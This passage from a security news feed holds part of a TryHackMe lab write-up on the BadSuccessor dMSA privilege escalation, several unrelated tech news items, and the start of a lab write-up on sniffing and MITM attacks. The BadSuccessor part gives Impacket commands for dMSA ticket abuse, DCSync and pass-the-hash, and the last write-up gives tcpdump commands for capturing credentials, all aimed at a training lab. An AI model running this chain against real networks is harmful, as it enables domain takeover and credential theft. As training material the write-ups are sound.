'P@SSw0rd345' --host DC-LAB2025-01.tryhackme.local get object 'pentest2_dmsa$'<br><br>## 2. (Optional) If account is created, but you didn't get TGT due to error, get the dMSA TGT<br>python3 getTGT.py -dc-ip 10.211.101.10 tryhackme.local/tbyte:'P@SSw0rd345'<br>export KRB5CCNAME=tbyte.ccache<br>python3 getST.py -k -no-pass -dc-ip 10.211.101.10 -impersonate 'pentest2_dmsa$' -self -dmsa 'tryhackme.local/tbyte'<br><br>## 3. Export the TGT into the environment variable so we can use it<br>export KRB5CCNAME=pentest2_dmsa_ts.ccache<br><br>## 4. DC sync to get administrator hash<br>python3 /opt/impacket/examples/secretsdump.py -k -no-pass 'pentest2_dmsa$'@DC-LAB2025-01.tryhackme.local<br><br>## 5. Pass the hash to get a shell as Administrator<br>python3 /opt/impacket/examples/wmiexec.py 'tryhackme.local/administrator@10.211.101.10' -hashes :984f755c74xxxxxxxxxxxxxx43976fec</pre><p><strong>Step 1: </strong>Check if our user have the CreateChild rights over any OU.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/955/1*Job6rds8zHWAYbCCBiSpPw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/456/1*r35RY976juPV-wC9Qemf2w.png"></figure><p><strong>Step 2: </strong>Create a dMSA object that is linked to ‘Administrator’ account</p><ul><li>I tried this in the AttackBox on THM and it worked without issue, then tried to replicate it on my own machine, and got an error below.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kAO4iAxqMfj64u22cvcIAw.png"></figure><ul><li>Despite the error, the dMSA account has already been created, as can be verified like below.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0jfNU9cGjtAFDq_tcO3tHg.png"></figure><ul><li>Get a TGT for your user, and export to KRB5CCNAME</li></ul><pre>python3 getTGT.py -dc-ip 10.211.101.10 tryhackme.local/tbyte:'P@SSw0rd345'<br>export KRB5CCNAME=tbyte.ccache</pre><ul><li>Now get a TGT for the dMSA account</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/956/1*trYdBszicYy6hV0vx_1s4g.png"></figure><p><strong>Step 3</strong>: Export the TGT into the environment variable so we can use it</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/710/1*-fDFxBJBhFlz2eSir76P7A.png"></figure><p><strong>Step 4</strong>: DC sync to get administrator hash</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aZco08886vTmAAmPcZWn_g.png"></figure><p><strong>Step 5</strong>: Get an administrator shell with Pass-the-hash</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/931/1*FAARsxHmsOkdTb0vB1wa_w.png"></figure><h3>References</h3><ul><li><a href="https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory">https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory</a></li><li><a href="https://www.tarlogic.com/blog/badsuccessor/">https://www.tarlogic.com/blog/badsuccessor/</a></li><li><a href="https://tryhackme.com/room/adbadsuccessor">https://tryhackme.com/room/adbadsuccessor</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=0f2c84223bbb" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/badsuccessor-exploiting-delegated-managed-service-accounts-in-windows-server-2025-0f2c84223bbb">BadSuccessor — Exploiting delegated Managed Service Accounts in Windows Server 2025</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Are you ready for what it takes to stop ghost guns?]]></title>
<description><![CDATA[In the summer of 2024, former Army National Guard member Andrew Scott Hastings spent a sweaty afternoon carefully packing boxes with parts he made using his 3D printer. These weren't novelty figurines or replacement Ikea pieces. The boxes were instead filled with a handful of homemade firearm low...]]></description>
<link>https://tsecurity.de/de/3651320/it-nachrichten/are-you-ready-for-what-it-takes-to-stop-ghost-guns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651320/it-nachrichten/are-you-ready-for-what-it-takes-to-stop-ghost-guns/</guid>
<pubDate>Tue, 07 Jul 2026 13:18:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In the summer of 2024, former Army National Guard member Andrew Scott Hastings spent a sweaty afternoon carefully packing boxes with parts he made using his 3D printer. These weren't novelty figurines or replacement Ikea pieces. The boxes were instead filled with a handful of homemade firearm lower receivers and more than 100 "switches," small […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Forget the hype — iPhone Ultra scarcity will tell the story]]></title>
<description><![CDATA[Apple has been working on a foldable smartphone for more than a decade. Having spent so much time developing the device, the company doesn’t want to ship something if it can’t make something good. Now, it looks like Apple can make a folding iPhone, but manufacturing them in decent quantities is g...]]></description>
<link>https://tsecurity.de/de/3649267/it-nachrichten/forget-the-hype-iphone-ultra-scarcity-will-tell-the-story/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649267/it-nachrichten/forget-the-hype-iphone-ultra-scarcity-will-tell-the-story/</guid>
<pubDate>Mon, 06 Jul 2026 17:49:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Apple has been <a href="https://www.computerworld.com/article/3832477/is-apple-almost-ready-for-foldable-iphones.html">working on a foldable smartphone</a> for more than a decade. Having spent so much time developing the device, the company doesn’t want to ship something if it <a href="https://www.applemust.com/getting-the-iphone-fold-right-matters-more-than-getting-it-soon/" target="_blank" rel="noreferrer noopener">can’t make something good</a>. Now, it looks like Apple can make a folding iPhone, but manufacturing them in decent quantities is going to take a little longer to bed in.</p>



<p>That’s the basic premise of this weekend’s <a href="https://x.com/mingchikuo/status/2073770705905123705" target="_blank" rel="noreferrer noopener">most interesting slice of Apple-related news</a>, which emerged from analyst Ming-Chi Kuo, who believes initial production of Apple’s folding iPhone — potentially called iPhone Fold or iPhone Ultra — will sell out fast, despite its likely $2,500 price tag. </p>



<p>That’s because he expects Apple will be able to make just 7 million or 8 million units of the device by the end of the year. This relatively low number could reflect previously reported build quality control challenges, which likely have required additional investment in manufacturing capabilities. (That lower number may have changed, since a recent report said Apple has increased <a href="https://www.applemust.com/apple-to-sell-10m-iphone-ultra-grab-29-share/" target="_blank" rel="noreferrer noopener">initial production to 10 million</a>, and is expected to grab 29% share of the foldable market.)</p>



<h2 class="wp-block-heading"><strong>Scarcity by design</strong></h2>



<p>As with so many iPhones across the near 20-year history of the device, a major new redesign always boosts gray-market sales. The analyst expects we will see this happen again, predicting that scarce supply, recognizable design, and an innovative user experience will help foster a short-term resale premium on second user markets. </p>



<p>To put that into perspective, the analyst predicts initial resale prices for the device could be 50% to 100% above the retail market price, with those elevated prices holding until a supply-demand balance is achieved.</p>



<p>Searching for a comparison, the analyst pointed to the iPhone X, which was scarce once it arrived, despite reaching stores two months after the other devices with which it was introduced.</p>



<p>Kuo thinks a similarly staggered release might happen with the folding device. He doesn’t think this will dent demand much. It didn’t with iPhone X; despite the cost and late debut, people really fell for the device. It captured <a href="https://www.applemust.com/apples-iphone-x-eats-over-half-the-smartphone-industry-pie/" target="_blank" rel="noreferrer noopener">over half of all smartphone revenue within weeks</a>, and sold at a rate of one <a href="https://www.applemust.com/apple-sells-an-iphone-x-every-three-seconds-in-europe/" target="_blank" rel="noreferrer noopener">every three seconds in Europe</a>. </p>



<h2 class="wp-block-heading"><strong>Scalp for victory</strong></h2>



<p>To some extent, we may be able to identify the momentum behind the new device’s launch just by watching its progress on second-user markets after it is introduced. If we can track higher prices for the device, that would imply the scale of unmet demand. Apple will want to stimulate that interest, so much of its work will be to focus on different sectors in which the advanced iPhone can make the biggest difference, perhaps as a field sales tool for executives or a Mac/iPad replacement for business travellers,. </p>



<p>The iPhone X swiftly became the most used smartphone <a href="https://www.cnbc.com/2018/05/04/apple-iphone-x-best-selling-smartphone-in-first-quarter.html" target="_blank" rel="noreferrer noopener">among business users</a>, and Apple’s going to try to press in that direction again. Expect increased marketing activity, innovative additional software features in the run up to the holiday period, and lots of influencers making cute videos in support of the launch. </p>



<p>To an extent, it’s only after the first few months, once demand/supply balance is achieved, that we can gauge success or failure.</p>



<p>“The best window for assessing true demand for the foldable iPhone is likely late 2026 to 1Q27,” the analyst said. That’s because by then the holiday shopping season will be done and “early production issues and supply constraints should have improved significantly,” he said.</p>



<h2 class="wp-block-heading"><strong>Can Apple reset smartphone pricing?</strong></h2>



<p>Consider this: The iPhone X was seen as a seriously expensive device once it appeared. It shipped with a then-unheard-of $999 price tag, $350 more than the $649 cost of the iPhone 7. </p>



<p>Apple’s success back then broke the <a href="https://thedecisionlab.com/reference-guide/psychology/pricing-psychology" target="_blank" rel="noreferrer noopener">psychological price barrier</a> for smartphones, making it acceptable for buyers to throw $1,000 at a new device. That’s normal today, with US consumers <a href="https://www.businesswire.com/news/home/20241104205789/en/New-Report-Reveals-Consumers-Spend-%241365-Per-Year-on-Mobile-Phone-Bills-Up-2-From-Last-Year" target="_blank" rel="noreferrer noopener">spending more than that each year</a>. </p>



<p>Apple’s decision to fly in a new high-end price point might deliver the same kind of energy, giving Apple access to the <a href="https://www.computerworld.com/article/4189546/apple-raises-hardware-prices-ai-is-to-blame.html">most premium consumers</a> even as it pushes into lower-end markets with e-series devices picking up where iPhone 7 left off. </p>



<p>What no one, including Apple or Ming-Chi Kuo, can know yet is whether <a href="https://www.applemust.com/what-we-think-we-know-about-iphone-ultra/" target="_blank" rel="noreferrer noopener">these specs</a>, iOS 27, and Apple Intelligence will be enough to convince consumers to buy these products.</p>



<p><em>Please join me on social media at </em><a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener"><em>BlueSky</em></a><em>,  </em><a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener"><em>LinkedIn</em></a><em>, or </em><a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener"><em>Mastodon</em></a><em>, even better, please subscribe to </em><a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener"><em>The Core</em></a><em> for your daily collection of human-curated Apple News.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Single points of failure fail. The SaaS layer is not an exception]]></title>
<description><![CDATA[Higher education has consolidated its entire academic operation into a handful of massive SaaS platforms. The LMS manages instruction, grading and communication. The SIS owns enrollment, records and financial aid. Identity and productivity live in a small number of cloud providers. These are not ...]]></description>
<link>https://tsecurity.de/de/3648395/it-security-nachrichten/single-points-of-failure-fail-the-saas-layer-is-not-an-exception/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648395/it-security-nachrichten/single-points-of-failure-fail-the-saas-layer-is-not-an-exception/</guid>
<pubDate>Mon, 06 Jul 2026 12:08:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Higher education has consolidated its entire academic operation into a handful of massive SaaS platforms. The LMS manages instruction, grading and communication. The SIS owns enrollment, records and financial aid. Identity and productivity live in a small number of cloud providers. These are not peripheral tools — they are the operational infrastructure of the institution. As IT stewards, we manage platforms we do not own, cannot restore ourselves and cannot directly control — which makes contingency planning not optional, but fundamental to the role.</p>



<p>The contracts are in place. The SLAs are signed. The compliance certifications are current. None of that matters to a student who cannot reach her instructor three days before finals. None of it matters to a faculty member who has no roster, no grade book and no way to document the work his students submitted before the platform went dark. SLAs govern vendor response timelines. Keeping academic operations running during that response window is IT’s responsibility.</p>



<p>The disruption hit during finals week 2026, and I was doing what every CIO in higher education was doing — monitoring. A major learning management system <a href="https://www.csoonline.com/article/4180194/lessons-from-the-canvas-cyberattack.html">had been breached</a>. The disruption spread fast. Finals were canceled. Exams were postponed. Students and staff were stranded without access to coursework, rosters or grade books. The costs — in academic disruption, extended contracts, emergency response — were substantial and widely reported. My institution was not directly impacted. But watching peer institutions in my own state go dark during the highest-stakes moment of the academic calendar was not reassuring. It was a confirmation of something I had been thinking about for a long time.</p>



<p>The disruption proved something IT professionals have relearned in every decade of their careers. Mark Twain observed that history does not repeat itself, but it does rhyme. This is a verse we have heard before: Dependence on a single point of failure, without a tested contingency plan, is not a strategy — it is a risk that has simply not yet been called. Whether the failure comes from a cyberattack, a vendor outage, an infrastructure collapse or a cloud provider’s bad deployment, the result is the same. The institution stops. And no SLA, contract or compliance certification prevents that moment from arriving.</p>



<p>Vigilance is not optional. Technologies are evolving faster than any IT team can fully anticipate. New platforms, new integrations, new dependencies emerge constantly — and with each one comes a new potential failure point. That is not an argument against adopting new technology. It is an argument for the one principle that never becomes obsolete: Reliance on any single critical system, whether it is a connectivity provider, an identity platform or a SaaS solution, is a proven strategy for failure. The question is never whether that system will fail. The question is whether the institution is prepared when it does.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Single points of failure fail — inevitably, and at the worst possible time. IT professionals have known this for thirty years. The SaaS layer is not exempt.</p>
</blockquote>



<p>This is not a new lesson. Azure has gone down. AWS has failed. <a href="https://er.educause.edu/articles/2026/5/how-higher-education-is-responding-to-the-canvas-lms-incident-and-preparing-for-whats-next">Google Workspace has had outages that took organizations dark globally</a>. No campus runs a single ISP connection — we provision redundant circuits, preferably from independent providers, because we learned long ago that the connection will sometimes fail and the institution cannot afford to stop when it does. Financial services, government and multinational enterprises applied that same logic to every dependency in their stack. Their response to platform risk was not to demand better SLAs. It was to architect around the dependency. Redundancy. Failover. Independent continuity capability. The massive disruptions from Canvas demonstrate that effective contingency solutions for these critical platforms have not kept pace with our dependence on them. We cannot get fooled again.</p>



<p>That omission is what made the 2026 attack so damaging. Not the sophistication of the breach — the entry point was a peripheral free-tier environment that wasn’t even within the vendor’s primary certification scope. The damage was catastrophic because institutions had no fallback. Faculty had no rosters. Administrators had no enrollment data. There was no continuity layer. A single point of failure, at institutional scale, with no plan for when it fails.</p>



<p>And now the economics have shifted in the worst possible direction. <a href="https://techcrunch.com/2025/05/08/powerschool-paid-a-hackers-ransom-but-now-schools-say-they-are-being-extorted/">PowerSchool paid a ransom in December 2024</a> after attackers stole data on 60 million students — and was re-extorted anyway, with individual school districts receiving separate demands months later using the same stolen data. <a href="https://www.instructure.com/incident_update">Instructure’s CEO publicly confirmed the extortion payment</a>. Anyone who has paid a ransom only to be hit a second time at double the cost can tell you — paying the attackers resolves nothing and instead invites more attacks. The sector has now proven twice, publicly, and at scale, that it will pay. That changes the threat calculus entirely. Higher education stops being a target of opportunity and becomes a target of strategy. Criminal groups share that intelligence. Banner serves over 1,400 institutions. Blackboard reaches tens of millions of users across thousands of campuses. Every major higher education SaaS platform is now on active threat actor priority lists — not because they are newly vulnerable, but because the sector has proven it will pay, that academic calendar pressure creates maximum leverage, and that IT has not yet built the operational alternative that our dependence on these platforms demands — and therefore the failure is ours to own, especially if we allow it to happen a second time.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>The sector has proven it will pay. Every ransomware group operating today just received the same market signal. What follows is not unpredictable — it is documented, underway and aimed directly at the platforms carrying your institution’s academic operations.</p>
</blockquote>



<p>As a CIO, my approach to this is not a spreadsheet or a stack of printed reports. IT is responsible for identifying critical failure points and countering them — that is not optional; it is the job. Accepting failure as inevitable without a mitigation strategy is not viable. Redundancy and continuity solutions are standard practice everywhere else in our infrastructure. There was no reason the SaaS layer should be different.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>A leader’s first job isn’t to be right — it’s to be responsible.</p>
</blockquote>



<p>The solution I implemented is a secure, read-only, centralized repository — a continuity strategy that ensures students, staff and faculty can continue to function whether the issue is a power outage, a cyberattack or a SaaS platform going dark. It is not a replacement for Canvas or Banner. It is the independent fallback that allows the institution to keep operating while the primary system is restored. I have learned the hard way that accepting failure without a plan is not a posture any CIO can defend.</p>



<p>Watching the frustration across the industry during and after the 2026 attack — institutions paralyzed, peer CIOs improvising, faculty working from personal spreadsheets, boards asking questions no one could answer — the logic of extending this capability to other institutions became unavoidable. The solution is not complex. The architecture is straightforward. The discipline behind it is thirty years old. The discipline is established. The responsibility to apply it is our field of expertise in IT.</p>



<p>To be precise about scope: An ACR does not prevent vendor breaches, replace cyber insurance or remove notification obligations. When an incident hits, legal counsel, security teams and institutional leadership still manage the response. What the ACR changes is what they have to work with — a governed, auditable record of what data was accessed, what manual actions were taken and how operations continued while the vendor worked to restore service.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Redundancy, disaster recovery, continuity of operations — the discipline is not new. The SaaS platforms carrying academic operations deserve the same standard we hold everywhere else.</p>
</blockquote>



<p>The solution to this problem exists. A SaaS third-party continuity of operations strategy requires an independent data layer — one the institution controls, synchronized on a regular scheduled cycle from source systems, and accessible when those systems are not. Platform-agnostic across Canvas, Banner, Blackboard and PowerSchool. Read-only by design. Auditable by requirement. Independent by architecture. That last word is the one that matters — independent of the platforms whose availability you cannot guarantee.</p>



<p>Every CIO in higher education knows what a single point of failure looks like. Every one of us has built around them at every other layer. Servers, networks, data centers — we do not accept the single-point risk, and we do not wait for the failure to motivate the fix. The SaaS layer is not an exception.</p>



<p>The question is not whether your institution will face it. The question is whether you will have a continuity strategy in place when it arrives — or be explaining to your board why you did not.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Leaders don’t rent accountability — they own it outright.</p>
</blockquote>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[EV Batteries Defy Expectations, Last Hundreds of Thousands of Miles]]></title>
<description><![CDATA[247,000 miles on an EV battery? So says the owner of a U.K.-based used-car sales company that specializes in Evs, who tells the Wall Street Journal EV batteries keep performing well even after several hundred thousand miles. "They are proving themselves to be exceptionally reliable."

After five ...]]></description>
<link>https://tsecurity.de/de/3646727/it-security-nachrichten/ev-batteries-defy-expectations-last-hundreds-of-thousands-of-miles/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646727/it-security-nachrichten/ev-batteries-defy-expectations-last-hundreds-of-thousands-of-miles/</guid>
<pubDate>Sun, 05 Jul 2026 14:53:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[247,000 miles on an EV battery? So says the owner of a U.K.-based used-car sales company that specializes in Evs, who tells the Wall Street Journal EV batteries keep performing well even after several hundred thousand miles. "They are proving themselves to be exceptionally reliable."

After five years on the road, the average EV will still be able to drive up to 95% of its original range, according to Recurrent, a data-science company that provides a battery-monitoring tool for EVs — better than many in the auto industry expected... 

Potential new car buyers' fear of having to pay for a battery replacement is the number one reason they choose to steer clear of EVs, according to a 2025 survey from industry research firm AutoPacific. When early EVs hit the market, buyers' concerns were well-founded. Roughly one in 12 EVs built from 2011 to 2016 have had to have battery replacements. But new data shows that more modern EVs are doing better so far. Among EVs built from 2022 on, 0.3% have had battery replacements, according to a 2025 study from Recurrent. As battery technology has advanced, EVs have avoided problems like the ones that plagued the original Nissan Leaf when it hit the market in 2010, for example. Those cars lacked the battery-cooling technology that is in newer EVs, and they made headlines for wearing down quickly. Buyer perception hasn't quite caught up, according to Scott Case, co-founder and chief executive of Recurrent... 

The newest battery-powered EVs have lifespans comparable to internal-combustion-engine vehicles, even when driven more miles, according to Viet Nguyen-Tien, a research officer at the London School of Economics who focuses on Evs. Improvements in car batteries' chemical contents, battery-management systems and thermal regulation have been the difference in making batteries last longer and cost less, Nguyen-Tien said. Battery prices have fallen more than 90% since 2010, according to a BloombergNEF report from late last year. Industry analysts say battery-replacement costs are also improving as more EVs are designed for repairability in the long-haul. An out-of-warranty battery replacement can cost anywhere from $5,000 to $16,000, depending on the manufacturer, according to Recurrent. But many EV manufacturers have shifted to allow smaller components of their battery packs to be repaired, which can allow owners to avoid the full costs of a battery replacement, Case said. 

EV batteries aren't without their challenges, though. A battery that is frequently fast-charged with high power loses its range, on average, at twice the rate of a battery charged at a lower power, according to telematics company Geotab. Frequently charging a battery to 100%, or letting it rest at 0% for extended periods, can also reduce range long-term. And EVs regularly deliver less range in extreme cold or heat. 
The article also includes two new projections on EV adoption:

"The share of new EVs sold is expected to nearly double to 11% of new-car sales in the U.S. by 2030, according to industry consulting firm AlixPartners."
"Globally, EVs already make up 15% of new-car sales and are expected to form nearly a quarter of the global market by 2030, according to AlixPartners."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=EV+Batteries+Defy+Expectations%2C+Last+Hundreds+of+Thousands+of+Miles%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0434229%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0434229%2Fev-batteries-defy-expectations-last-hundreds-of-thousands-of-miles%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/05/0434229/ev-batteries-defy-expectations-last-hundreds-of-thousands-of-miles?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Protocols and Servers 2 TryHackMe Writeup]]></title>
<description><![CDATA[Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.No exploit. No zero-day. Just a protocol that was never built to keep a secret.That’s the uncomfortable little truth this room is built around. So le...]]></description>
<link>https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/900/1*7OqFQcrh6OcgOZyqGjAyqw.png"></figure><p>No exploit. No zero-day. Just a protocol that was never built to keep a secret.</p><p>That’s the uncomfortable little truth this room is built around. So let’s pull it apart.</p><p>Most of the internet’s classic protocols were designed in a more trusting era. It was a time when the people sharing a network mostly knew each other, and “someone might be listening” wasn’t the default assumption.</p><p>Those protocols still run everywhere. And many of them still send your credentials across the wire in plain text.</p><p><strong>Protocols and Servers 2</strong> on TryHackMe is about exactly that gap, and what closes it. It walks through three foundational attacks against network protocols, then the defenses that neutralize each one:</p><ul><li>Sniffing — quietly reading traffic off the wire</li><li>Man-in-the-Middle (MITM) — sitting between two parties and tampering</li><li>Password attacks — guessing or cracking the credentials themselves</li></ul><p>This is a writeup of the whole room: the concepts in plain language, the commands that matter, and the task answers explained. If you’re working through it yourself, follow along.</p><blockquote>One idea ties the entire room together: cleartext protocols are insecure by design. Everything else is a consequence of that single fact.</blockquote><h3>Part 1 — Sniffing Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/911/1*mxa7u-z6cA7UEL5f8tjJQg.png"></figure><p>A <strong>sniffing attack</strong> is the simplest idea in the room: use a packet-capture tool to grab traffic as it crosses the network, then read it.</p><p>If a protocol talks in cleartext, anyone positioned to see that traffic can pull out private messages or login credentials. Nothing is encrypted before it leaves your machine.</p><pre>"Isn't everything encrypted now?"</pre><p>It’s tempting to think sniffing is a solved, retro problem now that TLS is everywhere. It isn’t. It stays dangerous wherever cleartext still lives:</p><ul><li><strong>Internal corporate networks</strong>, where machine-to-machine traffic is often left unencrypted</li><li><strong>Legacy systems </strong>like old mail servers, embedded devices, and industrial control systems</li><li><strong>Misconfigured services</strong> where TLS is available but not strictly enforced</li><li><strong>IoT devices</strong> that habitually use plain protocols</li><li><strong>Wireless networks</strong>, where anyone in range can listen</li><li>After a MITM attack that has successfully downgraded or stripped encryption</li></ul><blockquote>In real internal pentests and red-team work, sniffing is still one of the most reliable ways to harvest credentials and learn how systems actually talk to each other.</blockquote><h3>The tools</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xBxcZK8PVBApVtltOosP4Q.jpeg"><figcaption>Wireshark</figcaption></figure><p>Capturing packets needs a network card and the right privileges (root on Linux, administrator on Windows). Here are the staples:</p><ul><li><strong>tcpdump</strong> — lightweight open-source CLI capture tool, preinstalled on most Linux systems.</li><li><strong>Wireshark</strong> — the GUI standard, with powerful filtering, protocol dissection, and visualization.</li><li><strong>tshark</strong> — Wireshark’s command-line sibling, great for scripting.</li></ul><blockquote>Worth knowing too: <strong>tcpflow</strong> (reassembles TCP streams), <strong>ngrep</strong> (pattern-matching in traffic), and <strong>NetworkMiner</strong> (extracts files from captures).</blockquote><blockquote>Specialized credential-grabbers exist, but tcpdump and Wireshark can do the job with a little effort.</blockquote><h3>Capturing POP3 credentials with tcpdump</h3><p>The classic demo: a user checks email over POP3 (port 110, cleartext).</p><p>With access to the traffic — via a wiretap, a switch’s port mirroring, ARP spoofing, a compromised host, or a successful MITM — you run this command:</p><pre>sudo tcpdump port 110 -A</pre><p>Breaking that down:</p><ul><li>sudo — packet capture needs root privileges.</li><li>port 110 — only keep traffic to or from the POP3 server.</li><li>-A — print packet contents as ASCII, so cleartext is human-readable.</li></ul><p>In the capture, the login arrives across two packets and reads straight out:</p><pre>… USER frank … PASS D2xc9CgD</pre><p>Username frank, password D2xc9CgD, handed over in plain sight.</p><blockquote>Wireshark gets you there even faster: type “pop” in the display filter, and only POP3 traffic remains, credentials included.</blockquote><h4>Handy tcpdump filters</h4><pre>+------------------------------------+-----------------------------------------------------------+<br>| Command                            | Purpose                                                   |<br>+------------------------------------+-----------------------------------------------------------+<br>| sudo tcpdump port 110 -A           | Capture traffic on port 110 (POP3) in readable ASCII      |<br>| sudo tcpdump host 10.20.30.148 -A  | Capture ASCII traffic to/from a specific host IP          |<br>| sudo tcpdump port 80 -A            | Capture HTTP traffic (credentials in POST data)           |<br>| sudo tcpdump port 21 -A            | Capture FTP traffic (cleartext credentials)               |<br>| sudo tcpdump -w capture.pcap       | Save raw network packets to a file for later analysis     |<br>| tcpdump -r capture.pcap -A         | Read and display a saved capture file in ASCII text       |<br>+------------------------------------+-----------------------------------------------------------+</pre><h4>Mitigation</h4><p>Any cleartext protocol is exposed. The only requirement for the attack is a vantage point between the two parties or on the same network segment.</p><p>The core fix is encryption. This means wrapping the protocol in TLS (like HTTP to HTTPS, FTP to FTPS, or POP3 to POP3S) and replacing Telnet with SSH.</p><p>Layered on top of that:</p><ul><li>Network segmentation to limit who can see whose traffic</li><li>Encrypted VLANs or tunnels for sensitive internal traffic</li><li>802.1X port-based authentication so unknown devices can’t connect</li><li>Zero-trust thinking: treat every network as hostile and encrypt everything</li><li>Monitoring for ARP spoofing and other redirection to catch sniffing in progress</li></ul><p>Question: How do you capture only Telnet traffic with tcpdump? Answer: Telnet runs on port 23, so you add “port 23”.</p><p>Question: What is the simplest Wireshark display filter for IMAP? Answer: “imap”.</p><h3>Part 2 — Man-in-the-Middle (MITM) Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*uImWCNSpEizR46XoZzoc7g.png"><figcaption>Man-in-the-Middle Attack</figcaption></figure><p>Sniffing is passive listening. A <strong>MITM attack</strong> is active.</p><p>The attacker slips between two parties (A and B) so that A thinks it’s talking to B, while everything actually flows through the attacker. They can read and completely alter the data.</p><p>The room’s example says it best: A asks to transfer $20, the attacker rewrites the amount mid-flight, and B acts on the tampered message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C0zge6WQ4_HZjbPjnt1i0g.png"><figcaption>Image 1 from the room</figcaption></figure><p>It works whenever the protocol doesn’t verify the authenticity and integrity of each message.</p><h4>Getting into the middle</h4><p>To sit between two parties, an attacker has to redirect traffic through their own machine. Common routes include:</p><ul><li><strong>ARP spoofing</strong> — on a local network, the attacker sends forged ARP messages tying their own MAC address to the gateway’s IP, routing traffic directly to them.</li><li><strong>DNS spoofing </strong>— feeding false DNS answers to send victims to attacker-controlled servers.</li><li><strong>Rogue access points </strong>— fake Wi-Fi setups (like “Airport_WiFi_Free”) that route every connected victim’s traffic through the attacker.</li><li><strong>BGP hijacking </strong>— announcing false routes at the internet’s routing layer to reroute traffic for whole organizations or regions.</li></ul><h4>The tooling</h4><ul><li><strong>Bettercap </strong>— the modern, actively maintained successor to Ettercap. Handles ARP/DNS spoofing, HTTP/HTTPS proxying, and is modular.</li><li><strong>Ettercap</strong> — the classic LAN MITM tool. It still works, but Bettercap is generally preferred today.</li><li><strong>mitmproxy </strong>— an interactive HTTPS proxy used for inspecting and modifying web traffic on the fly.</li><li><strong>Responder </strong>—<strong> </strong>Windows-focused<strong>.</strong> Abuses fallback name-resolution protocols (LLMNR, NBT-NS) that kick in when DNS fails, answering with its own IP to capture authentication hashes. A staple of internal Active Directory 